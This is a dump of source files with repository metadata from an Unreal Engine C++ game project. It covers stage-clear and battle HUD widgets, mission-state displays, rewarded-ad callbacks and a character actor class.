(bWasClear)\n\t{\n\t\tm_pkImgIconLethalPrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextLethalPoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconLethalPrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextLethalPoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusTime(bool bWasClear, int32 nBonus)\n{\n\tABCHECK(nullptr != m_pkImgIconTimePrice);\n\tABCHECK(nullptr != 
m_pkTextTimePoint);\n\n\tm_pkTextTimePoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nBonus)));\n\n\tif (bWasClear)\n\t{\n\t\tm_pkImgIconTimePrice->SetVisibility(ESlateVisibility::Hidden);\n\t\tm_pkTextTimePoint->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tm_pkImgIconTimePrice->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tm_pkTextTimePoint->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusStageClear(int32 nStageClearBonus)\n{\n\tABCHECK(nullptr != m_pkTextStageClearPoint);\n\tm_pkTextStageClearPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nStageClearBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusMonsterKill(int32 nMonsterKillBonus)\n{\n\tABCHECK(nullptr != m_pkTextMonsterKillPoint);\n\tm_pkTextMonsterKillPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMonsterKillBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBonusMissionPoint(int32 nStarBonus)\n{\n\tABCHECK(nullptr != m_pkTextMissionPoint);\n\tm_pkTextMissionPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nStarBonus)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBtnBonusADTime(int32 nTime)\n{\n\tABCHECK(nullptr != m_pkTextClearADTimer);\n\tm_pkTextClearADTimer->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTime)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetBtnEnableAD(bool bEnable)\n{\n\tABCHECK(nullptr != m_pkBtnADView);\n\n\tif (m_pkBtnADView->bIsEnabled != bEnable)\n\t\tm_pkBtnADView->SetIsEnabled(bEnable);\n\n\tABCHECK(nullptr != m_pkTextClearADTimer);\n\tif (bEnable)\n\t\tm_pkTextClearADTimer->SetVisibility(ESlateVisibility::Hidden);\n\telse\n\t\tm_pkTextClearADTimer->SetVisibility(ESlateVisibility::HitTestInvisible);\n}\n\nvoid UPG_UserWidgetScreenStageClear::SetTotalReward(int32 nTotalReward)\n{\n\tABCHECK(nullptr != m_pkTextTotalPoint);\n\tm_pkTextTotalPoint->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nTotalReward)));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnADview()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StageClear3X);\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnGoHome()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\n\tUGameplayStatics::OpenLevel(GetWorld(), TEXT(\"/Game/PG/Maps/Lobby/MainLobby\"));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnRetry()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->RestartGame();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnBtnNext()\n{\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tpGameModeStage->SavePlayerData();\n\tpGameModeStage->SaveStageData();\n\tpGameModeStage->StartGame_NextStage();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADRewardVideoSucessed()\n{\n\tm_bWasViewStageClear3X = true;\n\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\t// Apply the reward\n\tpGameStateStage->RequestViewAD();\n\n\tSetBtnEnableAD(false);\n}\n\nvoid 
UPG_UserWidgetScreenStageClear::OnADRewardVideoError()\n{\n\tShowMessageBox(TEXT(\"Error\"), TEXT(\"Failed to get the reward.\\nPlease try again later.\"));\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADPlayStageVideoSucessed()\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance);\n\n\tpGameInstance->ResetADRemainTime(EADType::eAT_StagePlayAD);\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnADPlayStageVideoClosed()\n{\n\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnViewResultAD(bool bEnable)\n{\n\tUpdateClearStageLayout();\n}\n\nvoid UPG_UserWidgetScreenStageClear::OnMessagePopupBoxClose()\n{\n\tABCHECK(nullptr != m_pUserWidgetMessagePopup);\n\tm_pUserWidgetMessagePopup->SetVisibility(ESlateVisibility::Hidden);\n}" }, { "alpha_fraction": 0.7459227442741394, "alphanum_fraction": 0.7459227442741394, "avg_line_length": 16.923076629638672, "blob_id": "0fb59d7e38c11cfae7e281454010c443fa0ca22b", "content_id": "deb0e247c70ebde8ddae643959b7be7bae2378b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 103, "num_lines": 65, "path": "/Source/Project_Gun/Public/UI/PG_HUDBattleStage.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <Blueprint/UserWidget.h>\n#include \"PG_HUDBattleStage.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_HUDBattleStage : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected :\n\tvirtual void NativeConstruct() override;\n\t//virtual FReply NativeOnTouchEnded(const FGeometry& InGeometry, const FPointerEvent& InGestureEvent);\n\npublic :\n\tvoid BindPlayerState(class APG_MyPlayerState* APlayerState);\n\n\tvoid UpdateStageTimer();\n\tvoid UpdateRewardPoint();\n\tvoid UpdateLethalAttack();\n\npublic:\n\tUFUNCTION()\n\tvoid OnBtnRifle();\n\tUFUNCTION()\n\tvoid OnBtnFlame();\n\tUFUNCTION()\n\tvoid OnBtnShutgun();\n\tUFUNCTION()\n\tvoid OnBtnLaser();\n\tUFUNCTION()\n\tvoid OnBtnGrandle();\n\nprivate :\n\tUPROPERTY()\n\tclass UTextBlock* StageTimer;\n\t\n\tUPROPERTY()\n\tclass UTextBlock* RewardPoint;\n\n\tUPROPERTY()\n\tclass UTextBlock* LethalAttack;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Rifle;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Flame;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Shutgun;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Laser;\n\n\tUPROPERTY()\n\tclass UButton* Btn_Grandle;\n};\n" }, { "alpha_fraction": 0.7734929323196411, "alphanum_fraction": 0.785017728805542, "avg_line_length": 32.67910385131836, "blob_id": "04b2fecbbc09cbc72ee47f92d84ce0f4083a94da", "content_id": "3875b98f023d6b3f30d3a3a78541c9f78d1957da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4514, "license_type": "no_license", "max_line_length": 106, "num_lines": 134, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayMissionState.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetPlayMissionState.h\"\n#include \"Game/GameState/PG_GameStateStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n\n#include <Components/Button.h>\n#include <Components/TextBlock.h>\n\nvoid 
UPG_UserWidgetPlayMissionState::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK(UButton, BtnFlag);\n\tPG_WIDGET_LINK(UButton, BtnLethal);\n\tPG_WIDGET_LINK(UButton, BtnTime);\n\n\tPG_WIDGET_LINK(UTextBlock, TextCurrFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextCurrLethal);\n\tPG_WIDGET_LINK(UTextBlock, TextCurrTime);\n\n\tPG_WIDGET_LINK(UTextBlock, TextMaxFlag);\n\tPG_WIDGET_LINK(UTextBlock, TextMaxLethal);\n\n\tauto GameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tif (GameStateStage)\n\t{\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateFlag);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateLethal);\n\t\tGameStateStage->UdpateWidgetPlayStage.AddUObject(this, &UPG_UserWidgetPlayMissionState::OnUpdateTime);\n\t}\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionFlag()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataFlag(pGameModeStage->IsClearMission(EStageClearType::eSCT_AmountKill),\n\t\tpStagePlayData->NumberOfMonstersKilled,\n\t\tpStagePlayData->NumberOfMonsters);\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionLethal()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataLethal(pGameModeStage->IsClearMission(EStageClearType::eSCT_Lethal),\n\t\tpStagePlayData->NumberOfMonstersMuiltiKilled,\n\t\tpStagePlayData->NumberOfMonstersMuiltiKill);\n}\n\nvoid UPG_UserWidgetPlayMissionState::UpdateMissionTime()\n{\n\tauto pGameStateStage = Cast<APG_GameStateStage>(GetWorld()->GetGameState());\n\tABCHECK(nullptr != pGameStateStage);\n\n\tauto pGameModeStage = Cast<APG_GameModeStage>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeStage);\n\n\tconst FPGStagePlayData* pStagePlayData = pGameStateStage->GetStagePlayData();\n\tABCHECK(nullptr != pStagePlayData);\n\n\tSetDataTime(pGameModeStage->IsClearMission(EStageClearType::eSCT_ClearTime),\n\t\tpStagePlayData->RemainTime);\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t\tm_pkTextCurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\n\tm_pkBtnFlag->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tm_pkTextMaxFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t\tm_pkTextCurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 
0.0f)));\n\n\tm_pkBtnLethal->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tm_pkTextMaxLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::SetDataTime(bool bClear, int32 nCurrTime)\n{\n\tif (bClear)\n\t\tm_pkTextCurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.968f, 0.6f)));\n\telse\n\t\tm_pkTextCurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\n\tm_pkBtnTime->SetIsEnabled(!bClear);\n\n\tm_pkTextCurrTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrTime)));\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateFlag()\n{\n\tUpdateMissionFlag();\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateLethal()\n{\n\tUpdateMissionLethal();\n}\n\nvoid UPG_UserWidgetPlayMissionState::OnUpdateTime()\n{\n\tUpdateMissionTime();\n}" }, { "alpha_fraction": 0.6124876141548157, "alphanum_fraction": 0.6171952486038208, "avg_line_length": 30.53125, "blob_id": "4be67dd2e8b49e0d743d99bf77323e00a9953d68", "content_id": "1e66787e4c5ad376cc84c2af92e9fe1303a2ded8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4334, "license_type": "no_license", "max_line_length": 95, "num_lines": 128, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenStageClear.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenStageClear.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenStageClear : public UUserWidget\n{\n\tGENERATED_BODY()\n\t\nprotected:\n\tvirtual void NativeConstruct() override;\n\tvirtual void NativeTick(const FGeometry& MyGeometry, float DeltaTime) override;\n\npublic:\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic :\n\t// 스테이지 플레이 광고 재생 가능한지 검사\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateClearStageLayout();\n\n\tUFUNCTION()\n\tvoid ShowMessageBox(FString kTitle, FString kDescription);\n\n\tvoid SetBonusFlag(bool bWasClear, int32 nBonus);\n\tvoid SetBonusLethal(bool bWasClear, int32 nBonus);\n\tvoid SetBonusTime(bool bWasClear, int32 nBonus);\n\tvoid SetBonusStageClear(int32 nStageClearBonus);\n\tvoid SetBonusMonsterKill(int32 nMonsterKillBonus);\n\tvoid SetBonusMissionPoint(int32 nStarBonus);\n\tvoid SetBtnBonusADTime(int32 nTime);\n\tvoid SetBtnEnableAD(bool bEnable);\n\tvoid SetTotalReward(int32 nTotalReward);\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnADview();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnGoHome();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnNext();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoSucessed();\t\t// 유저가 보상형 광고를 성공적으로 보았음 (3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADRewardVideoError();\t\t// 유저가 보상형 광고 보는중 닫거나 실패하였음\t(3배 보상)\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid 
OnADPlayStageVideoClosed();\t// The stage play ad was closed or failed to play\n\t//============================================================================================\n\tUFUNCTION()\n\tvoid OnViewResultAD(bool bEnable);\n\n\t// Message popup box\n\tUFUNCTION()\n\tvoid OnMessagePopupBoxClose();\n\nprotected:\n\tPG_WIDGET_DECLAR(UTextBlock, TextTitle);\n\n\t//===================================================\n\t// Canvas MissionState\n\t//===================================================\n\t// Flag\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UImage, ImgIconFlagPrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextFlagPoint);\n\t// Lethal\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UImage, ImgIconLethalPrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextLethalPoint);\n\t// Time\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\tPG_WIDGET_DECLAR(UImage, ImgIconTimePrice);\n\tPG_WIDGET_DECLAR(UTextBlock, TextTimePoint);\n\t\n\t//===================================================\n\t// CanvasClearPointList\n\t//===================================================\n\tPG_WIDGET_DECLAR(UTextBlock, TextStageClearPoint);\t\t// Base stage clear point reward\n\tPG_WIDGET_DECLAR(UTextBlock, TextMonsterKillPoint);\t\t// Points earned from monster kills\n\tPG_WIDGET_DECLAR(UTextBlock, TextMissionPoint);\t\t\t// Mission success points\n\n\t//===================================================\n\t// CanvasViewAD\n\t//===================================================\n\tPG_WIDGET_DECLAR(UButton, BtnADView);\n\tPG_WIDGET_DECLAR(UTextBlock, TextClearADTimer);\n\n\t//===================================================\n\t// CanvasTotalPoint\n\t//===================================================\n\tPG_WIDGET_DECLAR(UTextBlock, TextTotalPoint);\n\n\t//===================================================\n\t// CanvasBottomMenu\n\t//===================================================\n\tPG_WIDGET_DECLAR(UButton, BtnGoHome);\n\tPG_WIDGET_DECLAR(UButton, BtnRetry);\n\tPG_WIDGET_DECLAR(UButton, BtnNext);\n\n\n\tbool m_bWasViewStageClear3X = false;\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\n\t// Message popup\n\tUPROPERTY()\n\tclass UPG_UserWidgetMessagePopup* m_pUserWidgetMessagePopup = nullptr;\n};\n"
Cast<APG_MyPlayerState>(GetOwningPlayerState());\n\tif (MyPlayerState)\n\t{\n\t\tMyPlayerState->OnUpdateRewardPoint.AddUObject(this, &UPG_UserWidgetScreenPlayStage::OnChangeRewardPoint);\n\t}\n}\n\nvoid UPG_UserWidgetScreenPlayStage::Init()\n{\n\tInitPlayStageWeaponBag();\n\tInitPlayMissionState();\n\n\tOnChangeRewardPoint();\n}\n\nvoid UPG_UserWidgetScreenPlayStage::InitPlayStageWeaponBag()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tauto pMyPlayerData = pMyPlayerState->GetPlayingPlayerData();\n\tABCHECK(nullptr != pMyPlayerData);\n\n\tauto pGameMode = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameMode);\n\n\tint nSlotIndex = 0;\n\tfor (auto WeaponIndex : pMyPlayerData->PlayerWeaponInventory)\n\t{\n\t\tint nAmmo = pGameMode->GetMaxAmmo(WeaponIndex);\n\n\t\tm_pkWB_PlayStageWeaponBag->SetSlotWaponIndex(nSlotIndex, WeaponIndex);\n\t\tm_pkWB_PlayStageWeaponBag->SetSlotWeaponAmmo(nSlotIndex, nAmmo);\n\n\t\t// Paid slot\n\t\tif (nSlotIndex == PG_MAX_WEAPON_SLOT - 1)\n\t\t\tm_pkWB_PlayStageWeaponBag->SetEnableSlot(nSlotIndex, pMyPlayerData->bExtendWeaponSlot);\n\t\telse\n\t\t\tm_pkWB_PlayStageWeaponBag->SetEnableSlot(nSlotIndex, true);\n\n\t\tnSlotIndex++;\n\t}\n\n\tUpdateWeaponSlotLightBox();\n}\n\nvoid UPG_UserWidgetScreenPlayStage::InitPlayMissionState()\n{\n\tABCHECK(nullptr != m_pkWB_MissionState);\n\n\tm_pkWB_MissionState->UpdateMissionFlag();\n\tm_pkWB_MissionState->UpdateMissionLethal();\n\tm_pkWB_MissionState->UpdateMissionTime();\n}\n\nvoid UPG_UserWidgetScreenPlayStage::UpdateWeaponSlotLightBox()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tint32 nSlotIndex = pMyPlayerState->GetPlayingPlayerData()->EquipWeaponInventoryIndex;\n\tm_pkWB_PlayStageWeaponBag->SetEnableLightBox(nSlotIndex);\n}\n\nvoid UPG_UserWidgetScreenPlayStage::OnFire()\n{\n\tABCHECK(nullptr != m_pkWB_PlayStageWeaponBag);\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\tint32 nSlotIndex = pMyPlayerState->GetPlayingPlayerData()->EquipWeaponInventoryIndex;\n\tint32 nAmmo = pMyPlayerState->GetPlayingPlayerData()->PlayerWeaponAmmo[nSlotIndex];\n\n\tm_pkWB_PlayStageWeaponBag->SetSlotWeaponAmmo(nSlotIndex, nAmmo);\n\n}\n\nvoid UPG_UserWidgetScreenPlayStage::OnChangeWeapon()\n{\n\tUpdateWeaponSlotLightBox();\n}"
You can turn this off to improve performance if you don't need it.\n\tPrimaryActorTick.bCanEverTick = false;\n\n\t{\n\t\tCharacterShadowComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"SHADOWCOMPONENT\"));\n\n\t\tstatic ConstructorHelpers::FObjectFinder<UStaticMesh>\n\t\t\tDEFAULT_SHADOW(TEXT(\"StaticMesh'/Game/PG/Meshs/Player/ShadowMesh.ShadowMesh'\"));\n\t\tif (DEFAULT_SHADOW.Succeeded())\n\t\t{\n\t\t\tCharacterShadowComponent->SetStaticMesh(DEFAULT_SHADOW.Object);\n\t\t\tCharacterShadowComponent->SetupAttachment(GetMesh());\n\t\t\tCharacterShadowComponent->SetCollisionEnabled(ECollisionEnabled::NoCollision);\n\t\t}\n\t}\n}\n\n// Called when the game starts or when spawned\nvoid APG_Char::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_Char::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n}\n\nvoid APG_Char::Destroyed()\n{\n\tSuper::Destroyed();\n}\n\nvoid APG_Char::FellOutOfWorld(const class UDamageType& dmgType)\n{\n\tSuper::FellOutOfWorld(dmgType);\n}\n\n// Called every frame\nvoid APG_Char::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n}\n\n// Called to bind functionality to input\nvoid APG_Char::SetupPlayerInputComponent(UInputComponent* PlayerInputComponent)\n{\n\tSuper::SetupPlayerInputComponent(PlayerInputComponent);\n\n}\n\nbool APG_Char::AssetLoadCharacter(FString AssetPath)\n{\n\tauto PGGameInstance = Cast<UPG_GameInstance>(GetGameInstance());\n\tABCHECK(nullptr != PGGameInstance, false);\n\n\tFSoftObjectPath CharacterAssetToLoad = AssetPath;\n\tAssetStreamingHandle = PGGameInstance->StreamableManager.RequestAsyncLoad(CharacterAssetToLoad, FStreamableDelegate::CreateUObject(this, &APG_Char::OnAssetLoadCharacterCompleted));\n\n\treturn true;\n}\n\nvoid APG_Char::Fire()\n{\n\n}\n\nvoid APG_Char::OnAssetLoadCharacterCompleted()\n{\n\tUSkeletalMesh* AssetLoaded = Cast<USkeletalMesh>(AssetStreamingHandle->GetLoadedAsset());\n\tAssetStreamingHandle.Reset();\n\n\tABCHECK(nullptr != AssetLoaded);\n\tABCHECK(nullptr != GetMesh());\n\n\tGetMesh()->SetSkeletalMesh(AssetLoaded);\n}" }, { "alpha_fraction": 0.7457817792892456, "alphanum_fraction": 0.7630296349525452, "avg_line_length": 33.20512771606445, "blob_id": "68fe1bd2af98b6148dd85b74dd5a460d44482717", "content_id": "932d0a84d961bc6882917f11c7a9e44167d9c3e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2669, "license_type": "no_license", "max_line_length": 98, "num_lines": 78, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageClearTarget.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageClearTarget.h\"\n\n#include <Components/Overlay.h>\n#include <Components/TextBlock.h>\n\nvoid UPG_UserWidgetStageClearTarget::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tABCHECK(nullptr != Flag_Clear);\n\tABCHECK(nullptr != Flag_InProgress);\n\tABCHECK(nullptr != Text_CurrFlag);\n\tABCHECK(nullptr != Text_MaxFlag);\n\tABCHECK(nullptr != Lethal_Clear);\n\tABCHECK(nullptr != Text_CurrLethal);\n\tABCHECK(nullptr != Text_MaxLethal);\n\tABCHECK(nullptr != Time_Clear);\n\tABCHECK(nullptr != Text_CurrTime);\n\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataFlag(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 
0.0f)));\n\t\tFlag_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tFlag_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrFlag->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tFlag_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tFlag_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tText_MaxFlag->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataLethal(bool bClear, int32 nCurrValue, int32 nMaxValue)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 0.0f)));\n\t\tLethal_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tLethal_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrLethal->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tLethal_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tLethal_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrValue)));\n\tText_MaxLethal->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nMaxValue)));\n}\n\nvoid UPG_UserWidgetStageClearTarget::SetDataTime(bool bClear, int32 nCurrTime)\n{\n\tif (bClear)\n\t{\n\t\tText_CurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(0.0f, 1.0f, 0.0f)));\n\t\tTime_Clear->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t\tTime_InProgress->SetVisibility(ESlateVisibility::Hidden);\n\t}\n\telse\n\t{\n\t\tText_CurrTime->SetColorAndOpacity(FSlateColor(FLinearColor(1.0f, 0.0f, 0.0f)));\n\t\tTime_Clear->SetVisibility(ESlateVisibility::Hidden);\n\t\tTime_InProgress->SetVisibility(ESlateVisibility::HitTestInvisible);\n\t}\n\n\tText_CurrTime->SetText(FText::FromString(FString::Printf(TEXT(\"%d\"), nCurrTime)));\n}" }, { "alpha_fraction": 0.7944250702857971, "alphanum_fraction": 0.8083623647689819, "avg_line_length": 19.5, "blob_id": "1859c01bb249a0431e517818563855e5144bcb64", "content_id": "a79abf12916a0d17c4aedc908d4ccec10428067e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 289, "license_type": "no_license", "max_line_length": 73, "num_lines": 14, "path": "/Source/Project_Gun/Public/Define/PG_DefineDelegate.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include 